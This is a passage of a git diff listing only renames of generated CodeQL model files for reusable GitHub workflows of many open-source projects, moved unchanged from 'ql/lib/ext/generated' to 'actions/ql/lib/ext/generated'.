ql/lib/ext/generated/reusable-workflows/lensesio_stream-reactor.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/lensesio_stream-reactor.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/leptos-rs_leptos.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/leptos-rs_leptos.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/leptos-rs_leptos.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/leptos-rs_leptos.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/lightning-ai_pytorch-lightning.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/lightning-ai_pytorch-lightning.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/lightning-ai_pytorch-lightning.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/lightning-ai_pytorch-lightning.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/liquibase_liquibase.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/liquibase_liquibase.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/liquibase_liquibase.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/liquibase_liquibase.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/litestar-org_litestar.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/litestar-org_litestar.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/litestar-org_litestar.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/litestar-org_litestar.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/llvm_circt.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/llvm_circt.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/llvm_circt.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/llvm_circt.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/lnbits_lnbits.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/lnbits_lnbits.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/lnbits_lnbits.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/lnbits_lnbits.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/lutris_lutris.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/lutris_lutris.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/lutris_lutris.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/lutris_lutris.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/mailu_mailu.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/mailu_mailu.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/mailu_mailu.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/mailu_mailu.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/mamba-org_mamba.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/mamba-org_mamba.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/mamba-org_mamba.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/mamba-org_mamba.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/manticoresoftware_manticoresearch.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/manticoresoftware_manticoresearch.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/manticoresoftware_manticoresearch.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/manticoresoftware_manticoresearch.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/marcelotduarte_cx_freeze.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/marcelotduarte_cx_freeze.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/marcelotduarte_cx_freeze.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/marcelotduarte_cx_freeze.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/materialdesigninxaml_materialdesigninxamltoolkit.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/materialdesigninxaml_materialdesigninxamltoolkit.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/materialdesigninxaml_materialdesigninxamltoolkit.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/materialdesigninxaml_materialdesigninxamltoolkit.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/matter-labs_zksync-era.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/matter-labs_zksync-era.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/matter-labs_zksync-era.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/matter-labs_zksync-era.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/mattermost_desktop.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/mattermost_desktop.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/mattermost_desktop.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/mattermost_desktop.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/mattermost_mattermost.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/mattermost_mattermost.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/mattermost_mattermost.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/mattermost_mattermost.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/mealie-recipes_mealie.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/mealie-recipes_mealie.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/mealie-recipes_mealie.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/mealie-recipes_mealie.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/meshery_meshery.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/meshery_meshery.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/meshery_meshery.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/meshery_meshery.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/meshtastic_firmware.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/meshtastic_firmware.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/meshtastic_firmware.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/meshtastic_firmware.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/microcks_microcks.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/microcks_microcks.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/microcks_microcks.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/microcks_microcks.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_applicationinsights-java.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/microsoft_applicationinsights-java.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/microsoft_applicationinsights-java.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/microsoft_applicationinsights-java.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_chat-copilot.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/microsoft_chat-copilot.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/microsoft_chat-copilot.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/microsoft_chat-copilot.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_msquic.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/microsoft_msquic.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/microsoft_msquic.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/microsoft_msquic.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_oryx.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/microsoft_oryx.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/microsoft_oryx.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/microsoft_oryx.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_pr-metrics.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/microsoft_pr-metrics.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/microsoft_pr-metrics.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/microsoft_pr-metrics.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_react-native-windows-samples.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/microsoft_react-native-windows-samples.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/microsoft_react-native-windows-samples.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/microsoft_react-native-windows-samples.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_vscode-cpptools.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/microsoft_vscode-cpptools.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/microsoft_vscode-cpptools.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/microsoft_vscode-cpptools.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/moby_buildkit.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/moby_buildkit.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/moby_buildkit.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/moby_buildkit.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/moby_moby.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/moby_moby.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/moby_moby.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/moby_moby.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/mosaicml_composer.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/mosaicml_composer.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/mosaicml_composer.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/mosaicml_composer.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/msys2_setup-msys2.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/msys2_setup-msys2.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/msys2_setup-msys2.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/msys2_setup-msys2.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/mudler_localai.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/mudler_localai.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/mudler_localai.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/mudler_localai.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/mustardchef_wsabuilds.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/mustardchef_wsabuilds.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/mustardchef_wsabuilds.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/mustardchef_wsabuilds.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/n8n-io_n8n.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/n8n-io_n8n.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/n8n-io_n8n.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/n8n-io_n8n.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/napari_napari.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/napari_napari.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/napari_napari.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/napari_napari.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/nasa_fprime.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/nasa_fprime.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/nasa_fprime.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/nasa_fprime.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/nautobot_nautobot.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/nautobot_nautobot.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/nautobot_nautobot.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/nautobot_nautobot.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/nektos_act.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/nektos_act.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/nektos_act.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/nektos_act.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/neondatabase_neon.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/neondatabase_neon.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/neondatabase_neon.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/neondatabase_neon.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/neovim_neovim.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/neovim_neovim.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/neovim_neovim.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/neovim_neovim.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/nethermindeth_nethermind.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/nethermindeth_nethermind.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/nethermindeth_nethermind.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/nethermindeth_nethermind.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-dotnet-agent.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-dotnet-agent.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-dotnet-agent.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-dotnet-agent.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-java-agent.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-java-agent.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-java-agent.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-java-agent.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/newrelic_node-newrelic.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/newrelic_node-newrelic.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/newrelic_node-newrelic.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/newrelic_node-newrelic.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/nexus-mods_nexusmods.app.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/nexus-mods_nexusmods.app.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/nexus-mods_nexusmods.app.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/nexus-mods_nexusmods.app.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/nginxinc_kubernetes-ingress.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/nginxinc_kubernetes-ingress.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/nginxinc_kubernetes-ingress.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/nginxinc_kubernetes-ingress.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/nocodb_nocodb.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/nocodb_nocodb.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/nocodb_nocodb.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/nocodb_nocodb.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/novuhq_novu.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/novuhq_novu.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/novuhq_novu.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/novuhq_novu.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/npm_abbrev-js.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/npm_abbrev-js.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/npm_abbrev-js.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/npm_abbrev-js.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/npm_cli.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/npm_cli.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/npm_cli.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/npm_cli.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/npm_fs-minipass.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/npm_fs-minipass.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/npm_fs-minipass.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/npm_fs-minipass.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/npm_hosted-git-info.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/npm_hosted-git-info.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/npm_hosted-git-info.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/npm_hosted-git-info.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/npm_ini.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/npm_ini.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/npm_ini.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/npm_ini.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/npm_json-parse-even-better-errors.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/npm_json-parse-even-better-errors.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/npm_json-parse-even-better-errors.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/npm_json-parse-even-better-errors.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/npm_minify-registry-metadata.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/npm_minify-registry-metadata.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/npm_minify-registry-metadata.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/npm_minify-registry-metadata.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/npm_mute-stream.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/npm_mute-stream.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/npm_mute-stream.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/npm_mute-stream.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/npm_node-semver.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/npm_node-semver.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/npm_node-semver.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/npm_node-semver.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/npm_node-which.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/npm_node-which.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/npm_node-which.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/npm_node-which.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/npm_nopt.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/npm_nopt.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/npm_nopt.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/npm_nopt.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/npm_normalize-package-data.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/npm_normalize-package-data.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/npm_normalize-package-data.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/npm_normalize-package-data.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/npm_write-file-atomic.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/npm_write-file-atomic.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/npm_write-file-atomic.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/npm_write-file-atomic.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/onflow_cadence.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/onflow_cadence.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/onflow_cadence.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/onflow_cadence.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/open-goal_jak-project.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/open-goal_jak-project.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/open-goal_jak-project.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/open-goal_jak-project.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-demo.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-demo.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-demo.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-demo.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet-contrib.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet-contrib.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet-contrib.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet-contrib.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-java-instrumentation.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-java-instrumentation.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-java-instrumentation.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-java-instrumentation.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-js-contrib.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-js-contrib.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-js-contrib.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-js-contrib.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-operator.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-operator.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-operator.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-operator.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/openbao_openbao.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/openbao_openbao.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/openbao_openbao.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/openbao_openbao.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/openhab_openhab-docs.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/openhab_openhab-docs.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/openhab_openhab-docs.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/openhab_openhab-docs.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/openmined_pysyft.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/openmined_pysyft.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/openmined_pysyft.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/openmined_pysyft.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/opentofu_opentofu.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/opentofu_opentofu.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/opentofu_opentofu.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/opentofu_opentofu.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/openttd_openttd.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/openttd_openttd.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/openttd_openttd.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/openttd_openttd.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/openvinotoolkit_openvino.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/openvinotoolkit_openvino.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/openvinotoolkit_openvino.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/openvinotoolkit_openvino.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/openxla_iree.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/openxla_iree.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/openxla_iree.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/openxla_iree.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/openzfs_zfs.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/openzfs_zfs.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/openzfs_zfs.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/openzfs_zfs.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/operator-framework_java-operator-sdk.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/operator-framework_java-operator-sdk.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/operator-framework_java-operator-sdk.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/operator-framework_java-operator-sdk.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/orange-opensource_hurl.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/orange-opensource_hurl.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/orange-opensource_hurl.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/orange-opensource_hurl.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/paolosalvatori_servicebusexplorer.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/paolosalvatori_servicebusexplorer.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/paolosalvatori_servicebusexplorer.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/paolosalvatori_servicebusexplorer.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/parcel-bundler_parcel.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/parcel-bundler_parcel.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/parcel-bundler_parcel.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/parcel-bundler_parcel.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/pardeike_harmony.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/pardeike_harmony.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/pardeike_harmony.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/pardeike_harmony.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/pcsx2_pcsx2.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/pcsx2_pcsx2.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/pcsx2_pcsx2.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/pcsx2_pcsx2.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/pennylaneai_pennylane.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/pennylaneai_pennylane.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/pennylaneai_pennylane.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/pennylaneai_pennylane.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/pinecone-io_pinecone-python-client.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/pinecone-io_pinecone-python-client.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/pinecone-io_pinecone-python-client.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/pinecone-io_pinecone-python-client.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/pixie-io_pixie.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/pixie-io_pixie.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/pixie-io_pixie.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/pixie-io_pixie.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/plantuml_plantuml.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/plantuml_plantuml.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/plantuml_plantuml.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/plantuml_plantuml.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/powerdns_pdns.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/powerdns_pdns.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/powerdns_pdns.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/powerdns_pdns.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/preactjs_preact.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/preactjs_preact.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/preactjs_preact.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/preactjs_preact.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/prismlauncher_prismlauncher.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/prismlauncher_prismlauncher.model.yml similarity index 100% rename from 